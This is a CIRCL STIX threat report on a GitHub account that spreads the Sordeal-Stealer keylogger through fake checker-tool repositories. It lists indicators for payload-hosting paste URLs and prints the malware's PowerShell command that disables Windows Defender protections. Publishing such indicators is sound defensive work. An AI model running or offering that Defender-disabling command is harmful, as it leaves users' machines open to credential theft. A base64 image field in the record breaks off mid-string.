2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--659a6331-0690-4b3b-ae16-e29a1fc31fc2" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T15:06:39.000Z" ,
"modified" : "2023-04-11T15:06:39.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--659a6331-0690-4b3b-ae16-e29a1fc31fc2" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T15:06:39.000Z" ,
"modified" : "2023-04-11T15:06:39.000Z" ,
"name" : "Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer" ,
"published" : "2023-04-11T15:07:07Z" ,
"object_refs" : [
"observed-data--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"user-account--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"malware--508397b3-2a52-4012-9969-f63c7d4f3872" ,
"indicator--abf89a2e-30f6-460f-80de-1556fb9aceb7" ,
"indicator--6040acc9-ef3c-40ac-b38b-47ebfacd06e4" ,
"indicator--ea61ae8e-8a2c-435e-811d-e1967ee7d111" ,
2023-05-19 09:05:37 +00:00
"indicator--8265c383-09dc-447c-b9b8-ba17d1b765ff" ,
"note--bbeedf0d-072f-4551-b886-b9c57f50137f"
2023-04-21 14:44:17 +00:00
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\"" ,
"tlp:clear" ,
"misp-galaxy:stealer=\"Sordeal-Stealer\"" ,
"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Alternative Protocol - T1048\"" ,
"misp-galaxy:mitre-attack-pattern=\"Browser Session Hijacking - T1185\"" ,
"misp-galaxy:mitre-attack-pattern=\"Keylogging - T1056.001\"" ,
"misp-galaxy:mitre-attack-pattern=\"GUI Input Capture - T1056.002\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T07:18:04.000Z" ,
"modified" : "2023-04-11T07:18:04.000Z" ,
"first_observed" : "2023-04-11T07:18:04Z" ,
"last_observed" : "2023-04-11T07:18:04Z" ,
"number_observed" : 1 ,
"object_refs" : [
"user-account--8c3b7eda-d3b0-4687-8150-230759232cb2"
] ,
"labels" : [
"misp:name=\"github-user\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
]
} ,
{
"type" : "user-account" ,
"spec_version" : "2.1" ,
"id" : "user-account--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"account_login" : "okkz" ,
"account_type" : "github" ,
"x_misp_bio" : "Self-taught python & web developer." ,
"x_misp_link" : "https://github.com/okkz" ,
"x_misp_profile_image" : {
"value" : "120434897.jpeg" ,
"data" : " / 9 j / 2 w C E A A g G B g c G B Q g H B w c J C Q g K D B Q N D A s L D B k S E w 8 U H R o f H h 0 a H B w g J C 4 n I C I s I x w c K D c p L D A x N D Q 0 H y c 5 P T g y P C 4 z N D I B C Q k J D A s M G A 0 N G D I h H C E y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M v / A A B E I A c w B z A M B I g A C E Q E D E Q H / x A G i A A A B B Q E B A Q E B A Q A A A A A A A A A A A Q I D B A U G B w g J C g s Q A A I B A w M C B A M F B Q Q E A A A B f Q E C A w A E E Q U S I T F B B h N R Y Q c i c R Q y g Z G h C C N C s c E V U t H w J D N i c o I J C h Y X G B k a J S Y n K C k q N D U 2 N z g 5 O k N E R U Z H S E l K U 1 R V V l d Y W V p j Z G V m Z 2 h p a n N 0 d X Z 3 e H l 6 g 4 S F h o e I i Y q S k 5 S V l p e Y m Z q i o 6 S l p q e o q a q y s 7 S 1 t r e 4 u b r C w 8 T F x s f I y c r S 0 9 T V 1 t f Y 2 d r h 4 u P k 5 e b n 6 O n q 8 f L z 9 P X 29 / j 5 + g E A A w E B A Q E B A Q E B A Q A A A A A A A A E C A w Q F B g c I C Q o L E Q A C A Q I E B A M E B w U E B A A B A n c A A Q I D E Q Q F I T E G E k F R B 2 F x E y I y g Q g U Q p G h s c E J I z N S 8 B V i c t E K F i Q 0 4 S X x F x g Z G i Y n K C k q N T Y 3 O D k 6 Q 0 R F R k d I S U p T V F V W V 1 h Z W m N k Z W Z n a G l q c 3 R 1 d n d 4 e X q C g 4 S F h o e I i Y q S k 5 S V l p e Y m Z q i o 6 S l p q e o q a q y s 7 S 1 t r e 4 u b r C w 8 T F x s f I y c r S 0 9 T V 1 t f Y 2 d r i 4 + T l 5 u f o 6 e r y 8 / T 19 v f 4 + f r / 2 g A M A w E A A h E D E Q A / A P N r s Z v b g n p u 4 / K o d p x V i 4 G + 6 m P / A E 0 N R t h V y T g V J q d Z 4 W K w a N N L I w V B K S S e w A F U b / V p t U Z o o S Y 7 H o e z T f 4 L / O q F s 9 x L Y R 20 p 22 y t v E e O X P X 5 v 8 A C r F X G P U i T 6 C A A A A D A F L R R W h m F F F F A B R R R Q A U U U U w C i i i g A o o o p A F F F F A B R R R T A K K K K A C i i i h g F F F F I A o o o o A K K S l o A K Q g M p U j I N L R Q M y L 1 L q D K / a J 5 I D k D d I T j P Y 574 N M T U 7 x J 45 h M W e N / M U s A f m y T z x z 95 u v r 7 C t h 0 W S M o 4 y D x W a d H u X n 2 W y i Q E g D 5 g O p w B + Z q H F L U d x w 1 u 5 E t j L 5 U L S W i u q l w S H D D B y M + n 680 l / q i a h b K k l q s b x r i M x v h Q T 944 I 74 H H Y 5 q t J p 97E5 R 7 a Q M A x x t P R c Z P u O R z 71E1 v c L k t B K A D g k o R g / l U X T A 3 W 1 z S J 0 t I 5 t F R V h X b I 0 W 0 G Q e X t x 0 H 8 Q B y c k c + t U p p d E k S 58 i y l h d i W h 3 M W 2 D a + F J B 5 + b Z z j s a y w c i l o S A m u o Y W u 7 n 7 J K i w K 58 o N u 5 X t / k 0 6 z 0 9 b u a W N r 62 h 2 b A G d g A 2 W A 4 J x 0 z k / T 8 a r 8 e g p M C q u K x u 2 / g 29 v F m a 0 v b K U Q q r P t c n B K s 2 O A c Y C E n N Z 13 o t 9 Y N O t w q A w H D 4 b P 8 Q X + Z q m B t 6 c Z 9 K f 5 k m w o J X 2 n q o P B 5 z 0 o C y 6 D O o o w R 0 N H S i g Y 5 m e Q g u 5 Y g Y G T m k p K W k A U U U U A F F F F A C E c 0 h 4 p 1 G K A J 7 V 1 i U 3 b X I E 9 q y N B C 6 F h J z z 9 M d f x r d g G s T J C I p r C U e U r L 8 h 4 A U j B I H X 5 / w D O K 56 C S O G d J J Y E n j U 5 a J y Q G H o S O a s 2 y W I T F 7 F e R y s d w M f A 2 E D H B 69 + a l o C G + j n i v H j u Y x H M o U N G P 4 e B x 9 e n 61 X r S a P S p I 3 c X E w c D j f g l 22 Z P H p n A z 71 H q l l b W E r R w 3 g u C G 42 g Y K 7 Q Q c g + 5 G P a m m S i j S g 0 l F M o 1 C D v l c 4 w X Y k / j S W s J u W E z g + U D 8 g P f 3 p f L + 0 S m B S T G r k y t 2 O S c L / j W i B g A d h 0 o j H q U 5 C / S i i i t T M K K K K A C i i i g A o o o p g F F F F A B R R R Q A U U U U A F F F F A B R R R S A K K K K A C i i i g A p G Y L j J x k 4 H 1 p a h u Y 2 k g Y J 98 c q f e g C a i m R O J Y U k A w G A P 0 p + P e g Y U U U U C C i i i g A p s i L J G Y 2 H y k c 0 6 i g Z A 7 p a l F T V r q N 8 c 5 J y q n s C R j H X v 7 U 4 s D d W z w 61 H M S + B 5 q F Q p w O u O 3 A 5 P r 9 a W 4 h 8 + E q M B w Q y E j o R y K y X u o 3 l u 2 u L S J X l L E B R t 8 p t p G A O e 5 B / C s X C z K u P b R L x E t H X y p F u 5 P K i M b 7 g z e m e l N u t I v r K 3 j n n g Z E k w V 7 k 5 B I O P T 5 W / I 1 J L d W k 1 v I A s 0 M q E v C A 3 y h i y d h w P l D 8 / S q w v 7 s r g 3 U x B Q x 4 Z y f l O e O e n U / m f W m D A 2 F 4 I I 5 z b y e V I M o w G d w 2 l v / Q Q T 9 B m o O V 5 I I + t W 11 O 9 W 2 W 384 t E i G N F K j 5 Q U Z M g 9 e F Z g O v W p b z W 769 j n S d o 284 B X I T B w G 3 A D 8 T + Q A o E Z + 6 j c O v 9 a e H h E W 0 2 + X x w 4 c 9 d u P 581 q 6 f c a G R p 8 F 9 Z u o V x 9 q n B P K 5 y c Y O c 9 B 0 45 o u B k d e R S V d u v 7 L J P 2 T z Q P J P 38 / w C s + T p 7 f f 8 A 0 q k M 4 o A K W k p a A C i i i g A o o o o A K M 0 U h o A U 1 e t t V v r W V b 5 b k P I k Z t l E h 3 E J j p g 9 q o n p U u + 2 + w G I 25 + 0 m U M J 9 / R M c r t 6 d e c 0 m P o b c s l 5 D J I 1 z p 1 r s 5 l w C D g B F 3 Y I 7 Y A J H u a h Z H Q s J d E D E b h K w w e B t B I x 0 P B 5 / w B q q U p s w k o E k y A l / L D E g k F B t B / H I P 4 V Z e N F W 4 i t d b Z 8 K 7 I m f 9 Z y P l z 78 / l U o z a s U 9 Q a 1 M o + y 2 s k C Z O V f r n 0 69 q p 1 Y v b i a e c i a c T F C Q H C 4 z z y a r 1 Z S O i g i W C F Y 15 x y T 6 n u T 9 a k o o r V C C i i i g A o o o o A K K K K Y B R R R Q A U U U U A F F F F A B R R R Q A U U U U A F F F F I A o o o p g F F F F I A p D S 0 h p g Q W 26 O W a I n 5 c 70 + h / 8 A r 5 q x V W 43 R z Q y o p Y 7 v L K j u D / k V Y R g 6 h h 0 I p A O o o o o A K K K K A C i l x x k U l A B 9 K g k s r G a Q S X U z W 4 Y 4 e U A k A 444 x 64 q w D g g 0 s 8 C S R n I B i k H c A 4 P 0 N J q 40 V b X Q L S f S r a 7 k 1 i C G W b / l i Q C Q d 6 r j r n O G 3 f g a g j 8 P X c 43 W 81 v I p 24 w 2 D y o b p + O K s 3 e s W R l m R / D 9 h G 5 w A V B G O Q e 349 + h r M L 6 S 7 k N a T L F k b d j Z Y D 5 c 9 T j s //AH17VlqNk02halbxh5YVVSpcN5i4IALHHPOAKqTWF7AzCa0mQKSCTGcZHXn8vzrRSXSTbSRpqOqwgq+I3AZWyu3aQDwCMr16VailWb9wPEnyS7lf7TFtBXLYyxORkBe/fHai4HOEFSAwwe4p2Mitx9JutQd7e1+x3AjQTCeGRmBARR5YJ7gAHk1mXenXVndRWrhWmkhEu1Dnau0tznocA/lTugKu3FLUj2t1G8SSW0yvKdsatGQWPoPU1GQyuyMrBlOGBHIPvQAUU0tjrx35pfxp2AWikB460ZpALRSZooAWkIzS0UAFSiFfsouBPEX8zy/I534xnd0xjt1qI9KQBS4yDj2pNDR0d/Lqge6M9tA53yNIysSAWjAOAew4b6iq93qtsWu4JtItoXdXXMYBMbEg5HHbGPxNS3EOjie4jtdSuLQCXYsLo5AXaPvDGeuRj0xTDo2m3B3/ANuwq7M25pcAkhwM4JzyCW5qRPUhhl0FrOKO5SUSqjjfECGJLjBbJxwuenFTRW3hh0zJqF6jbjwEzxk47dcYqodEmNzcQxyo3l8xk/8ALUb9vy4yOp9aZLoWqW8hjlgKsCR99ecHHr6g1QGtRRRWxIUUUUAFFFFABRRRTAKKKKACiiigAooooAKKKKQBRSUUDFqCGQyTT9cK+0fkKldgilieFGTVTSyz2SSv96Vmc/iTQIu0UUUAFFFFABRRRQBHMDs3r96Mh1+oOf6Vp6zYx2c8N9agmyvwHUDpG5GSPoaoYzxXV6LBDqvhOG0m+ZdrQt6qVOAfr0NTJ21NIK5ylRTzCGLzCpIGM47DPWpXhltriW1nGJYW2t7jsfxFIyhkZGHykYIqk7kNWYo5xSqrMGIBIXrVWzkZrYBvvISh+oq9aSFZdp5DjBFAmNjI3FW+6wpHUo20/nUjxASoVzsY4PtTipkhYH78Zx9RQJMr1YgZQm1uhPfsar1LDhg8Z6MKBmfr1oAEuYx/svj9D/MViV2DqLqwdD97BVvr/nmuQKlGKNwRwaiRSEIxRiiipAXJDZGQae11cvC0JuZvKbqgkIB7dPpxTKTFICyL+686CVpmZ4JPNRm5IY4yeev3RV+bxNfzpcLItuTOMM
} ,
"x_misp_repository" : [
"Tiktok-Username-Checker" ,
"Steam-ID-Checker" ,
"Tiktok-Username-Checker" ,
"lure-s-tiktok-username-checker-LEAKED" ,
"Steam-ID-Checker" ,
"Discord-Token-Checker"
]
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--508397b3-2a52-4012-9969-f63c7d4f3872" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T07:43:07.000Z" ,
"modified" : "2023-04-11T07:43:07.000Z" ,
"description" : "Fetched from https://rentry.co/shitbymyself/raw" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"PowerShell"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
] ,
"x_misp_script" : "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--abf89a2e-30f6-460f-80de-1556fb9aceb7" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:34.000Z" ,
"modified" : "2023-04-11T08:08:34.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/shitonyourAV/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--6040acc9-ef3c-40ac-b38b-47ebfacd06e4" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:42.000Z" ,
"modified" : "2023-04-11T08:08:42.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/shitbymyself/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:42Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--ea61ae8e-8a2c-435e-811d-e1967ee7d111" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:50.000Z" ,
"modified" : "2023-04-11T08:08:50.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/9ops5/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--8265c383-09dc-447c-b9b8-ba17d1b765ff" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:59.000Z" ,
"modified" : "2023-04-11T08:08:59.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/khsph/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:59Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
2023-05-19 09:05:37 +00:00
{
"type" : "note" ,
"spec_version" : "2.1" ,
"id" : "note--bbeedf0d-072f-4551-b886-b9c57f50137f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T15:06:39.000Z" ,
"modified" : "2023-04-11T15:06:39.000Z" ,
"abstract" : "Notes" ,
"content" : "The GitHub account [okkz](@[suggestion](https://github.com/okkz)) hosting a series of repository with malicious Python code. The code is obfuscated and install/execute a keylogger called [Sordeal-Stealer](https://github.com/SOrdeal/)." ,
"object_refs" : [
"report--659a6331-0690-4b3b-ae16-e29a1fc31fc2"
]
} ,
2023-04-21 14:44:17 +00:00
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}
